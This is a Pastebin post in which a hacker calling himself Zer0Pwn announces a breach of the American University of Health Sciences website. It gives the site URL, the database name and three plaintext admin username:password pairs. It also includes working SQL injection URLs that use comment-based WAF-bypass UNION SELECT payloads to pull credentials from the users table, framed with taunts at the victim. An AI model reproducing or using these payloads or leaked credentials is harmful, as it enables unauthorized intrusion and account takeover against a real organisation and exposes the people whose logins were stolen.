Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ______ ___ _____
- |___ / / _ \| __ \
- / / ___ _ __| | | | |__) |_ ___ __
- / / / _ \ '__| | | | ___/\ \ /\ / / '_ \
- / /_| __/ | | |_| | | \ V V /| | | |
- /_____\___|_| \___/|_| \_/\_/ |_| |_| @Zer0Pwn - Zer0Pwn
- #############################################
- Here is my message.
- You were somewhat targeted.
- To prove lack of security, in even what are supposed to be the most advanced web-systems on the internet.
- Your security is a joke.
- To all of you celebrating it wasn't you that got hacked... Be prepared -- Because you just might be next.
- Secure your web-systems.
- I love challenges.
- #############################################
- Today's dump includes...
- Admin passwords for the America University of Health Sciences.
- Target ==> American University of Health Sciences
- URL ==> http://www.auhs.edu/
- Reason ==> To prove lack of security in anything, and everything.
- Vulnerability ==> SQL Injection with WAF Bypassing.
- MySQL Version ==> 5.
- Database Name ==> gjohnson_website
- #############################################
- These are the admin users for the website.
- Username:Password (Keep in mind these are plaintext ^_^).
- #########################
- # tam:auhsweb4321 #
- # nguyen:4567 #
- # toannguyen:toan12345 #
- #########################
- Proof ==> (USER 1) http://www.auhs.edu/mainpage.php?pageID=-4 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,/*!CoNcAt*/(user_login,0x3a,user_pass) FROM gjohnson_website.tbl_users limit 0,1--+-
- (USER 2) http://www.auhs.edu/mainpage.php?pageID=-4 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,/*!CoNcAt*/(user_login,0x3a,user_pass) FROM gjohnson_website.tbl_users limit 1,1--+-
- (USER 2) http://www.auhs.edu/mainpage.php?pageID=-4 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,/*!CoNcAt*/(user_login,0x3a,user_pass) FROM gjohnson_website.tbl_users limit 2,1--+-
- #############################################
- For more action, follow me on twitter @Zer0Pwn.
Add Comment
Please, Sign In to add comment